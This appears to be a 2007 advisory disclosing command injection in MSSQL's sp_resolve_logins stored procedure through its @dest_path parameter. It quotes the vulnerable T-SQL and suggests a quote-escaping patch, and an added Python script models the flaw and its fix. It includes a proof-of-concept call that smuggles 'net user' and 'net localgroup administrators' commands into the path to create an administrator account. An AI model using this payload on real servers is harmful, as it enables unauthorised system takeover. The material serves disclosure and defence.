Info: an injection in one of MSSQL's own stored procedures
Author: Crazy [BCT]
Date: 10/11/2007
I could see that MSSQL filters its stored procedures following a pattern, so I read through their stored procedures, and an injection was found.
Said the madman.
The vulnerability information is as follows:
In the stored procedure master..sp_resolve_logins, the @dest_path parameter is not strictly filtered, resulting in xp_cmdshell injection.
Analysis: the relevant code is as follows:

select @dest_path = rtrim(ltrim(@dest_path))
-- If the last char is '\', remove it.
if substring(@dest_path, len(@dest_path), 1) = '\'
    select @dest_path = substring(@dest_path, 1, len(@dest_path) - 1)
-- Don't do validation if it is a UNC path due to security problem.
-- If the server is started as a service using local SYSTEM account, we
-- don't have access to the UNC path.
if substring(@dest_path, 1, 2) <> '\\'
begin
    select @command = 'dir "' + @dest_path + '"'
    exec @retcode = master..xp_cmdshell @command, 'no_output'
    if @@error <> 0
        return (1)
    if @retcode <> 0
    begin
        raiserror(14430, 16, -1, @dest_path)
        return (1)
    end
end
This section of master..sp_resolve_logins applies a few checks to @dest_path (trimming, stripping a trailing backslash, skipping UNC paths), but it never filters the double quotation mark. A " inside @dest_path closes the quoted argument of the dir command, so xp_cmdshell ends up executing arbitrary system commands.
Test code:

exec sp_resolve_logins 'text', 'e:\ASP\" & net user admina admin /add & net localgroup administrators admina /add & dir "E:\ASP', '1.asp'
After executing the preceding MSSQL statement, a system account named admina is successfully added.
However, the stored procedure's code checks that the caller holds the sysadmin role, so the injection requires sysadmin permission.
The madman's suggested patch is as follows: filter @dest_path with the fn_escapecmdshellsymbolsremovequotes function, for example

select @dest_path = rtrim(ltrim(fn_escapecmdshellsymbolsremovequotes(@dest_path)))

so that no injection can occur.
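The following Python script is an added example, not code from the original post or from SQL Server. It models the command construction shown in the analysis above (trim, strip a trailing backslash, skip UNC paths, then concatenate into dir "...") beside a hardened variant that applies the quote-removal and cmd.exe symbol-escaping approach the patch section describes, plus an audit check that flags a built command whose caller-controlled text has escaped the quoted argument. The escaping routine is an assumption modelled on what such a filter must achieve, not the T-SQL implementation of fn_escapecmdshellsymbolsremovequotes; the hostile and benign paths are constructed sample inputs, with echo standing in for a chained command.

```python
import re
from typing import Optional

# cmd.exe metacharacters that chain or redirect commands when they appear
# outside a quoted argument; the caret is cmd's own escape character.
CMD_METACHARS = frozenset('&|<>^()')


def build_dir_command_unsafe(dest_path: str) -> Optional[str]:
    """Model of the command construction in sp_resolve_logins.

    Mirrors the procedure: trim, drop one trailing backslash, skip UNC paths,
    then concatenate the path into   dir "<dest_path>"   with no escaping.
    Returns None when the procedure would issue no shell command at all.
    """
    dest_path = dest_path.strip()
    if dest_path.endswith('\\'):
        dest_path = dest_path[:-1]
    if dest_path.startswith('\\\\'):  # UNC path: no validation, no dir call
        return None
    return 'dir "' + dest_path + '"'


def escape_cmdshell_symbols_remove_quotes(value: str) -> str:
    """Python model (an assumption, not SQL Server's T-SQL implementation) of
    what a fn_escapecmdshellsymbolsremovequotes-style filter has to achieve:
    drop every double quote so the argument cannot be closed early, then
    caret-escape each remaining cmd.exe metacharacter so it is passed literally.
    """
    without_quotes = value.replace('"', '')
    return ''.join('^' + ch if ch in CMD_METACHARS else ch
                   for ch in without_quotes)


def build_dir_command_hardened(dest_path: str) -> Optional[str]:
    """Patched variant: filter @dest_path before it reaches the concatenation."""
    return build_dir_command_unsafe(escape_cmdshell_symbols_remove_quotes(dest_path))


def argument_is_contained(command: Optional[str]) -> bool:
    """Audit check for a built command: it must consist of exactly one quoted
    argument after 'dir'. Any extra quote means caller-controlled text has
    broken out of the argument and could chain further commands."""
    if command is None:
        return True
    return re.fullmatch(r'dir "[^"]*"', command) is not None


if __name__ == '__main__':
    # Constructed sample inputs: a path whose embedded quote closes the dir
    # argument early, and an ordinary local directory path.
    hostile = 'e:\\ASP\\" & echo injected & dir "E:\\ASP'
    benign = 'E:\\ASP\\'
    for label, path in (('hostile', hostile), ('benign', benign)):
        unsafe = build_dir_command_unsafe(path)
        safe = build_dir_command_hardened(path)
        print(f'{label:8} unsafe   : {unsafe!r:60} contained={argument_is_contained(unsafe)}')
        print(f'{label:8} hardened : {safe!r:60} contained={argument_is_contained(safe)}')
```

Running the script shows the hostile path producing an unsafe command with three quote characters, which the audit check rejects, while the hardened build of the same input keeps everything inside a single quoted argument and neutralises the ampersands. The same regular-expression check can be pointed at any other procedure that builds an xp_cmdshell command string by concatenation.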